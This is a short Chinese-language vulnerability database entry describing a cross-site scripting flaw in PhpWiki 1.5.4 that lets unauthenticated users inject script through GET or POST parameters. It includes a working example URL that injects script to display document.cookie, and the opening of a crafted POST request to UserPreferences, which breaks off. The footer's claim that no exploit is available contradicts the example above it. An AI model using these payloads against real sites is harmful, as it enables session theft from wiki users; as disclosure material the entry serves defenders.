PhpWiki 1.5.4 Cross Site Scripting /...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

<p>1/ 跨站点脚本漏洞</p><p>跨站点脚本漏洞允许未经身份验证的远程用户通过GET或POST 参数将任意网页脚本注入代码。</p><p>Example url:<br><a href="http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--" rel="nofollow">http://192.168.0.10/phpwiki/index.php?pagename=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C!--</a></p><p>Example request:<br>POST /phpwiki/index.php/UserPreferences HTTP/1.1<br>Host: 192.168.0.10<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0<br>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br>Accept-Language: pl,en-US;q=0.7,en;q=0.3<br>Accept-Encoding: gzip, deflate<br>Cookie: folder_p-tbx=Open; PHPSESSID=3ko4uprjgmnjtmfkes3dnh0gk4; PhpWiki_WIKI_ID=admin<br>Connection: keep-alive<br>Content-Type: application/x-www-form-urlencoded<br>Content-Length:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息